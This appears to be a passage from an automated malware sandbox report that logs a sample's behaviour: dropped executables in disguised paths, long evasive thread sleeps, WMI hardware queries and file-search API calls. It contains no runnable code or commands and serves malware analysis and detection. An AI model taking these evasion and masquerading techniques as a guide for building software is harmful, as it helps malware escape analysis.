                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\LVZlWyIJ.logJump to dropped file
                                    Source: C:\ChainbrowserNet\serverDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\NYMTshMF.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23733
                                    Source: C:\ChainbrowserNet\serverDll.exe TID: 3760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 1235 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep count: 1457 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 1455 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9176Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8916Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep count: 957 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9136Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep count: 1220 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140Thread sleep time: -15679732462653109s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204Thread sleep count: 1268 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 888Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8932Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 1638 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9120Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep count: 1269 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144Thread sleep time: -9223372036854770s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228Thread sleep count: 1318 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9148Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8868Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508Thread sleep count: 1196 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9172Thread sleep time: -11990383647911201s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500Thread sleep count: 1567 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9196Thread sleep time: -9223372036854770s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8572Thread sleep count: 1176 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9132Thread sleep time: -7378697629483816s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8968Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 1415 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9184Thread sleep time: -17524406870024063s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496Thread sleep count: 1045 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9180Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552Thread sleep count: 1712 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8624Thread sleep count: 1245 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9128Thread sleep time: -11990383647911201s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8748Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8632Thread sleep count: 1747 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep count: 1229 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9208Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8660Thread sleep count: 1112 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe TID: 4432Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe TID: 8744Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\Memory Compression.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\Memory Compression.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainbrowserNet\serverDll.exe TID: 6560Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainbrowserNet\serverDll.exe TID: 6100Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\Videos\System.exe TID: 6600Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\Videos\System.exe TID: 10044Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 4584Thread sleep time: -30000s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -11068046444225724s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -600000s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -599871s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -599547s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9660Thread sleep time: -21600000s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -598891s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -598391s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -597703s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -597500s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -597172s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -596797s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -596469s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -596266s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -595983s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -595750s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -595360s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -594875s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -594453s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -594188s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9660Thread sleep time: -600000s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -593891s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -593701s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -593500s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -593228s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -592937s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -592453s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -592000s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -591641s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -591125s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -590625s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -590297s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -589906s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -589281s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -588844s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -588266s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -587902s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -587563s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -586547s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -586156s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -585703s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -585360s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -584840s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -584360s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -584050s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -583281s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -583028s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582906s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582531s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582281s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582100s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581984s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581864s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581725s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581621s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581487s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581360s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581240s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581031s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580875s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580738s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580610s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580485s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580358s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580235s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580037s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579899s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579773s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579669s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579547s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579422s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579312s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579203s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ChainbrowserNet\serverDll.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainbrowserNet\serverDll.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainbrowserNet\serverDll.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\Videos\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\Videos\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A3A69B
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A4C220
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4E6A3 VirtualQuery,GetSystemInfo,0_2_00A4E6A3
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\Videos\System.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\Videos\System.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 30000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 599871
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 599547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 3600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 598891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 598391
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597172
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596797
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596469
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595983
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595750
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594188
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 300000
